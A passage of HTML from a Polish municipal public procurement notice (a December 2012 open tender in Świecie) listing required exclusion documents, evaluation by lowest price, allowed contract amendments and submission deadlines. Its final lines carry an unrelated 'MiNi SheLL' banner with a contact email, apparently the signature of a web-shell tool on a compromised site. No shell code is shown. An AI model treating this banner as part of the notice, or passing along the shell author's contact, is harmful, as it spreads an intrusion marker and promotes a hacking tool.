<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony i podpisany Formularz oferty (lub zgodny z załączonym wzorem) - Załącznik nr 1,
/ Wymagana forma dokumentu - oryginał /

2.	Wycena opracowania dokumentacji projektowej sporządzona na podstawie - Załącznika nr 2 
/ Wymagana forma dokumentu - oryginał/

3.	Pełnomocnictwo w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
W przypadku składania oferty przez Wykonawców występujących  wspólnie należy załączyć pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i  zawarcia umowy w sprawie niniejszego zamówienia.
/ Wymagana forma dokumentu - oryginał lub kopia poświadczona notarialnie/</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy może być dokonana w przypadku zmian nieistotnych w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Ponadto zmiana umowy także istotna może być dokonana w przypadku okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności:
1)	niezależnie od Wykonawcy zmiany dotyczące osób kluczowych dla realizacji umowy (projektant, weryfikator), zmiana ww. osób musi być uzasadniona przez Wykonawcę i zaakceptowana przez Zamawiającego. Kwalifikacje i doświadczenie wskazanych osób muszą być co najmniej takie same jakie były wymagane w SIWZ.
2)	niezależnie od stron umowy wydłużenie terminu realizacji zamówienia z uwagi na okoliczności:
-	zmiany przepisów prawnych obowiązujących w dniu zawarcia umowy i w trakcie jej realizacji,
-	wystąpienie niezgodności pomiędzy częścią opisową a kartograficzną ewidencji gruntów,
-	przedłużeniu uległy procedury administracyjne, opóźnienia na etapie wydawania opinii, uzgodnień, postanowień i decyzji administracyjnych nie wynikających z winy Wykonawcy,
-	wystąpienia nadzwyczajnych warunków pogodowych nie pozwalających na wykonanie zamówienia w terminie,
-	wystąpienia zdarzeń losowych ,
-	wystąpienia prac dodatkowych niezbędnych do prawidłowego wykonania zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia pod warunkiem wyrażenia zgody przez Zamawiającego,
-	nastąpił sprzeciw właścicieli terenu na prowadzenie prac przygotowawczych (pomiary, badania geodezyjne, geologiczne),
Termin może ulec przedłużeniu o czas trwania tych okoliczności 
3)	dotyczących sposobu i zakresu wykonania prac w przypadkach:
-	zmiany przepisów powodujących konieczność przyjęcia innych rozwiązań technicznych lub uzyskania dodatkowych decyzji,
-	zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
-	ograniczenia zakresu rzeczowego
4)	wystąpienia konieczności zmiany podwykonawcy dla części zamówienia, którą Wykonawca wskazał w ofercie, że powierzył ją do wykonania podwykonawcy, za zgodą Zamawiającego i z zachowaniem zasad dot. podwykonawców określonych we wzorze umowy,
5)	w szczególnie uzasadnionym przypadku wystąpienia konieczności realizacji przez podwykonawcę części zamówienia, której Wykonawca nie wskazał w ofercie, że  powierzy ją do wykonania podwykonawcy, za zgodą Zamawiającego i z zachowaniem zasad dot. podwykonawców określonych we wzorze umowy,
6)	sytuacji gdy Wykonawca opierał się na zasobach podmiotów trzecich wykazując spełnienie warunków udziału w postępowaniu, dopuszcza się zmianę tych podmiotów na etapie realizacji zamówienia, pod warunkiem, że nowy podmiot wykaże spełnienie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne.
7)	W przypadku zmian wynikających z powyższych zapisów wymagana będzie zgoda Zamawiającego i zawarcie stosownego aneksu do umowy.
8)	Nie stanowią zmian umowy w rozumieniu art.144 ustawy Pzp udzielanie zamówień dodatkowych określonych w przepisach ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip3.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świeciu, ul. Wojska Polskiego 124, 86 - 100 Świecie, pok. nr 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2012 godzina 09:00, miejsce: Urząd Miejski w Świeciu, ul. Wojska Polskiego 124, 86 - 100 Świecie, pok. nr 21 (I pietro, w sekretariacie).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Otwarcie ofert nastąpi dnia 18 grudnia 2012 r. o godz. 10:00 w sali nr 04 budynku Wydziału Inwestycyjnego Urzędu Miejskiego w Świeciu, ul. Wojska Polskiego 124, 86 - 100 Świecie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com